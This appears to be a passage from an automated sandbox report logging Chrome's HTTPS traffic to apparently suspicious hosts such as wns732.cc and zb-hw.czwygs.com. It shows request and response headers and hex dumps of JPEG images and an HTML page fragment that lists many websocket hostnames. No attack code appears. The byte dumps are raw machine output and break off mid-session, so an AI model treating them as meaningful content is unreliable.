                                                                                                                                                          2024-06-09 22:40:56 UTC15676INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          168192.168.2.54990990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC637OUTGET /pc/image-pc/video/lebo_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:56 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17920
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4600"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,1],EU-GER-frankfurt-GLOBAL1-CACHE2[448],EU-GER-frankfurt-GLOBAL1-CACHE2[444,TCP_MISS,446],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 72f74602f5685326710ba5a8436d8e88
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814484
                                                                                                                                                          X-CCDN-Expires: 2464135
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:56 UTC15752INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:56 UTC2168INData Raw: 47 0d 80 be c3 75 83 76 e5 8b 35 00 68 53 c0 e6 23 15 ac db 45 f6 9d fb d3 09 fc a1 fe 6b c7 b8 ce 5b 8a e3 32 45 e8 58 38 93 72 2e 3d 90 44 83 ff 00 d3 62 a5 40 76 65 b4 d8 29 e8 3f 87 f6 eb 59 fa 63 2f 3a b0 9c 85 b3 20 34 5b c6 3b e2 4f 75 68 e8 1c c4 29 4e 11 36 40 12 f2 7f 14 6e 90 1d c5 54 65 32 50 f2 1d 8f 49 80 81 83 ec ee ee 7a 15 cc 5f 77 75 ad bf d5 c9 91 6d b6 d3 6d ba 9b df 4b 75 69 53 94 1d e6 65 ce df a2 02 e5 55 a9 19 b3 44 47 99 ff 00 48 94 93 9b c5 e4 a7 84 39 8e ce cb c4 ad a4 9f e0 c7 4b 45 2e 1e be 6d e3 af df 6a 6a 52 af 73 38 2f 70 1d 76 14 b6 f2 72 66 a4 37 b5 f8 91 a4 26 23 88 20 e8 4e df 22 94 47 52 05 47 56 ca cd c2 99 87 19 15 33 d9 7d 89 68 46 d7 51 25 c4 3c e9 23 c5 4b 6c 04 9b fd 95 02 85 14 ab 54 b2 a9 45 c5 ea 28 a3 4a 97
                                                                                                                                                          Data Ascii: Guv5hS#Ek[2EX8r.=Db@ve)?Yc/: 4[;Ouh)N6@nTe2PIz_wummKuiSeUDGH9KE.mjjRs8/pvrf7&# N"GRGV3}hFQ%<#KlTE(J


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          169192.168.2.54991590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC366OUTGET /pc/image-pc/video/gd_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17264
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4370"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[2],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE2[422],EU-GER-frankfurt-GLOBAL1-CACHE12[405,TCP_MISS,419],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 7eb08adcda15c9314286b9c4bc548322
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814484
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:57 UTC15751INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:40:57 UTC1513INData Raw: a2 ab c2 cc 46 9c 81 3a a5 2c 49 3c 4b 61 dc 03 06 1c 3b f1 4d 2b b3 2a 91 20 69 8c 70 00 70 0f 8f 79 3c 4f 1e e5 6a f1 cf 79 b8 9f 13 cc 66 ae 71 b6 d9 db eb 7e 65 77 94 93 90 de dd ac 20 e3 ed 32 9b bb b0 63 6c 56 e1 a3 69 24 64 b7 69 66 79 54 b8 89 63 0a 80 6e 34 2b 6d 95 6b 42 22 46 23 40 0c cf 89 8f 19 49 9d bd 4c 00 c1 df 1c 95 fa 3b 8d 2a 32 26 22 47 51 2e ed 80 97 08 87 ff 00 4b 92 71 66 c1 04 c1 f3 6e 0b 63 cb f2 99 63 61 c8 79 1e 36 f7 8a 5c 61 f2 77 57 b2 ad bd ee 57 23 76 9d b9 ae 2e a4 92 e6 f0 5b 23 2b 6d 1d b6 90 80 ab 45 a9 34 b2 6d 2b ce 90 8b c6 24 4c 10 de 98 81 c0 61 17 f9 2a f1 ba a3 1a a6 4d 22 0c 08 2f 9c 89 e3 99 6f 9f 72 98 e0 f3 56 37 79 8e 2f 90 9b 15 2d be 0e cf 87 cd c5 f3 c6 58 94 ed 59 cd d1 32 59 43 24 a4 c8 b1 19 91 97 ba
                                                                                                                                                          Data Ascii: F:,I<Ka;M+* ippy<Ojyfq~ew 2clVi$difyTcn4+mkB"F#@IL;*2&"GQ.Kqfnccay6\awWW#v.[#+mE4m+$La*M"/orV7y/-XY2YC$


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          170192.168.2.54991490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC636OUTGET /pc/image-pc/video/guide.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:57 UTC634INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 75656
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Sat, 24 Aug 2019 10:08:29 GMT
                                                                                                                                                          ETag: "5d610c9d-12788"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[4],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE4[295],EU-GER-frankfurt-GLOBAL1-CACHE12[290,TCP_MISS,293],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: c99bd08c4910b253122413b943f0b6fb
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814485
                                                                                                                                                          X-CCDN-Expires: 2464134
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:40:57 UTC15750INData Raw: ff d8 ff db 00 84 00 02 01 01 01 01 01 02 01 01 02 03 02 01 02 03 03 02 02 02 02 03 03 03 03 03 03 03 03 05 03 04 04 04 04 03 05 05 05 06 06 06 05 05 07 07 08 08 07 07 0a 0a 0a 0a 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 02 02 02 04 03 04 07 05 05 07 0a 08 07 08 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff dd 00 04 00 53 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 02 20 02 93 03 00 11 00 01 11 01 02 11 01 ff c4 00 ad 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 03 03 03 02 05 02 04 04 04 03 06 05 02 07 01 00 02 03
                                                                                                                                                          Data Ascii: SAdobed
                                                                                                                                                          2024-06-09 22:40:57 UTC16384INData Raw: af fb a8 90 9e db 2e 16 6f 26 c8 b2 c9 b5 3e 61 ce 77 e7 75 9e 86 c7 0c cf 0c 2e cf 1d 82 44 58 aa 2b d5 45 ba 4f 3a 12 46 39 69 e0 a8 ce 09 90 91 32 b3 ae 9c 23 d5 4f 03 44 c4 7e 6f 95 99 f1 d0 b5 b3 21 78 ba 54 dc 2a 5d 55 50 73 2b b6 c1 e0 27 aa 8f 82 c8 24 51 dc 66 c3 09 f6 e5 51 22 c4 66 eb aa 4b ce 91 ef ca ae 4c 91 92 ea 8a b3 af 46 76 1b a7 89 8c c8 75 2d 68 6d 23 80 38 6a d1 07 6c b1 ae 8c 64 ef 32 b8 ef b8 dd 74 31 33 34 86 8b 88 db bf 2b 6c 19 54 fc 05 8d 5b f3 ee b4 45 99 32 44 69 e0 97 11 f0 b5 e3 67 3f 3c 41 11 04 e4 2d 31 39 53 5d 93 61 76 30 7b 2d 11 66 79 22 ca 89 fa 48 2e f8 5a a0 cc f3 45 bd 14 c0 38 2b 13 31 64 46 82 d2 03 18 d7 bb 92 73 fe ca d8 9c cc c5 a4 2e 25 5c 63 92 25 b5 df cb 24 77 0a 44 29 11 e5 7e 4a 09 24 56 de 70 31 37 6e
                                                                                                                                                          Data Ascii: .o&>awu.DX+EO:F9i2#OD~o!xT*]UPs+'$QfQ"fKLFvu-hm#8jld2t134+lT[E2Dig?<A-19S]av0{-fy"H.ZE8+1dFs.%\c%$wD)~J$Vp17n
                                                                                                                                                          2024-06-09 22:40:57 UTC16384INData Raw: 3b d8 a7 19 f6 46 4a d1 6a da b6 96 07 11 9d b9 5a 77 30 b8 50 66 ae 36 0d 4f d9 a3 92 93 c9 43 50 65 35 7d d0 d4 d4 38 83 98 db b0 ca cf 2c b6 cd d8 f1 52 11 4f 53 ea d9 4e 13 1c a0 5a 50 d6 e8 c6 4f a7 b2 d5 09 99 67 02 d6 0b af 95 11 79 3c 70 55 b6 63 96 1b 63 94 77 99 62 3a e3 79 69 e7 3d 92 f2 4b 47 1f 05 ed bb ae aa e9 d9 e5 ca 75 7f ba 1c 51 a6 1c c9 c4 9f 1f 88 64 37 0e 69 50 f6 cb 57 a9 35 f0 53 f5 17 53 4b 77 7f e6 22 00 38 f7 56 45 51 9b 3e 77 99 fd 23 35 5d 3e a2 70 54 ac 94 22 55 54 c9 b9 2a 13 66 c8 22 ba a2 4c 92 4f 0b 34 d9 a6 28 8d 21 e7 dd 56 5c 31 21 db 75 19 32 51 1b 7b 9c 1a 00 50 6c 9a 1a 71 cb b3 d9 56 d9 30 15 00 f0 21 f1 92 77 08 a0 b1 a9 a9 cb c6 7b 05 09 44 92 90 d7 90 1a 76 1b aa f4 25 6c 7a 38 f7 18 0a 51 8f 64 59 3a 9a 23 26
                                                                                                                                                          Data Ascii: ;FJjZw0Pf6OCPe5}8,ROSNZPOgy<pUccwb:yi=KGuQd7iPW5SSKw"8VEQ>w#5]>pT"UT*f"LO4(!V\1!u2Q{PlqV0!w{Dv%lz8QdY:#&
                                                                                                                                                          2024-06-09 22:40:57 UTC16384INData Raw: ed 94 38 b9 c4 0c 00 ec ab e3 33 3b 83 34 be 23 f5 bd 1b e9 a3 a0 a8 8e 46 be 9a 5d 24 9c 1c 92 d0 14 32 41 ea 99 3c 52 5b 34 57 d8 29 2f 3d 41 71 a7 b6 d8 69 df 35 ca a1 cd 65 3c 6d 21 ae 2e 3e a1 bf 65 08 75 d8 f2 bb 54 7b 1b c6 ee 8a 1d 29 e0 17 4f 75 6f 49 4b f8 7e a0 7b 69 69 6b 1c e7 12 75 f9 67 5b 7d 5b 67 50 ee 16 3e 26 47 2c d2 4d f4 68 cb 04 b1 a6 bc 9c ce e5 f5 db e3 85 aa 99 b6 9b e5 25 05 54 70 30 44 1d 24 6f 8d fa 58 34 82 4b 08 19 56 cb d2 b1 c9 f9 64 3f 79 28 fc 1e 70 eb 9e a6 9b aa 7a 82 b3 a8 1f 0b 63 9e b6 67 d4 ca c0 f7 16 87 3c e4 81 9d d6 e4 9c 22 a3 f4 64 b5 27 65 15 0d 96 e5 7b 96 58 e8 c3 33 10 d6 e0 e7 63 62 71 b2 a2 6d 9a 20 91 0e e3 d2 d7 a8 5e 59 2b 1b 86 ec 70 e1 85 44 ac be 2d 22 a3 0e 86 6d 12 34 ea 69 c1 c6 39 0a b5 22 db
                                                                                                                                                          Data Ascii: 83;4#F]$2A<R[4W)/=Aqi5e<m!.>euT{)OuoIK~{iikug[}[gP>&G,Mh%Tp0D$oX4KVd?y(pzcg<"d'e{X3cbqm ^Y+pD-"m4i9"
                                                                                                                                                          2024-06-09 22:40:57 UTC10754INData Raw: 84 a6 91 7c 38 93 97 84 5b 54 78 3b d4 71 40 6b ae b5 14 94 64 6e e8 df 2f 98 7f fa 58 0e 54 16 5f ab 34 2f 4d 9f e1 14 5f f6 3a ba aa 42 2a a7 89 8d c9 2c 73 3d 04 81 df 4a b6 d2 1a f4 e9 7d 93 ac fe 12 dd 7a 84 7e 2e df 23 3c 98 c9 63 9f 21 6b 58 d2 3b ee 54 65 91 44 b2 3e 9d 7f 21 5e bc 1a 82 d3 4b 25 5d 6f 51 52 8a e8 da 5e ca 76 07 39 ce 23 7c 65 bb 6e 92 ca df 84 12 f4 ed 57 f9 1c e3 cc 06 47 3a a4 98 dd 92 4e 78 03 d8 2b ac c0 d0 ba 99 a6 22 39 58 74 b1 bc 82 01 d4 3b 7b 24 81 21 b7 b1 93 9d 55 59 f2 c9 f4 b5 bf e9 9e 11 74 4a 82 67 91 15 43 64 66 a3 11 f4 e3 9c 1f 64 58 a8 94 c7 46 d3 23 5e f1 1b 3b 34 9d f3 8e 02 8b 62 d4 8d 7a b9 cd 6f e9 aa 96 40 58 e8 6a 31 15 40 76 c1 f8 39 0d cf 3f b2 96 35 72 2f e3 3d 59 ce ee 35 34 12 35 cd 96 49 62 9b 3b
                                                                                                                                                          Data Ascii: |8[Tx;q@kdn/XT_4/M_:B*,s=J}z~.#<c!kX;TeD>!^K%]oQR^v9#|enWG:Nx+"9Xt;{$!UYtJgCdfdXF#^;4bzo@Xj1@v9?5r/=Y545Ib;


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          171192.168.2.549912202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC699OUTGET /default.html HTTP/1.1
                                                                                                                                                          Host: wns732.cc
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          Cookie: com_env=p
                                                                                                                                                          2024-06-09 22:40:57 UTC404INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:56 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 35313
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Last-Modified: Fri, 18 Aug 2023 04:30:01 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          ETag: "64def3c9-89f1"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:57 UTC15980INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 2e 69 6e 69 74 2d 69 70 2d 62 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 74 6f 70 3a 20 30 3b 6c 65 66 74 3a 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head> <meta charset=utf-8> <meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"> <title></title> <style> .init-ip-block{position: fixed;top: 0;left: 0;background-color
                                                                                                                                                          2024-06-09 22:40:57 UTC16384INData Raw: 20 20 22 77 73 73 61 2d 33 36 31 2e 69 78 69 61 6f 73 68 69 7a 69 2e 63 6f 6d 3a 31 37 38 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 77 73 73 61 2d 33 35 31 2e 74 61 69 6a 75 65 74 61 69 71 75 61 6e 64 61 6f 2e 63 6f 6d 3a 31 36 38 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 31 39 36 32 2e 77 77 77 62 79 66 65 6e 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 31 39 36 32 2e 68 79 64 71 65 66 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 2d 61 77 73 2e 62 61 6b 65 64 64 6f 76 65 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 63 73 61 70 69 2d 61 6b 61 2e 62 6c 61 63 6b 6b 68 61 6b 69 39 31 38 2e 63 6f 6d 22 2c 0d 0a 20 20 20 20 20
                                                                                                                                                          Data Ascii: "wssa-361.ixiaoshizi.com:1785", "wssa-351.taijuetaiquandao.com:1685", "ocsapi1962.wwwbyfen.com", "ocsapi1962.hydqef.com", "ocsapi-aws.bakeddove.com", "ocsapi-aka.blackkhaki918.com",
                                                                                                                                                          2024-06-09 22:40:57 UTC2949INData Raw: 2f 20 72 61 74 69 6f 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 61 6e 67 65 2e 62 6f 74 74 6f 6d 20 3d 20 4d 61 74 68 2e 63 65 69 6c 28 28 74 6f 70 20 2b 20 62 74 6e 48 29 20 2f 20 72 61 74 69 6f 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 6e 76 61 73 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 69 67 68 74 20 3d 20 4d 61 74 68 2e 63 65 69 6c 28 63 61 6e 76 61 73 2e 77 69 64 74 68 20 2f 20 32 20 2b 20 62 74 6e 57 20 2f 20 32 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 66 66 73 65 74 58 20 3d 20 65 2e 6f 66 66 73 65 74 58 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f
                                                                                                                                                          Data Ascii: / ratio) range.bottom = Math.ceil((top + btnH) / ratio) canvas.addEventListener('click', function (e) { var right = Math.ceil(canvas.width / 2 + btnW / 2) var offsetX = e.offsetX var o


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          172192.168.2.54991154.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:56 UTC553OUTGET /cc.png?r=2281974097 HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
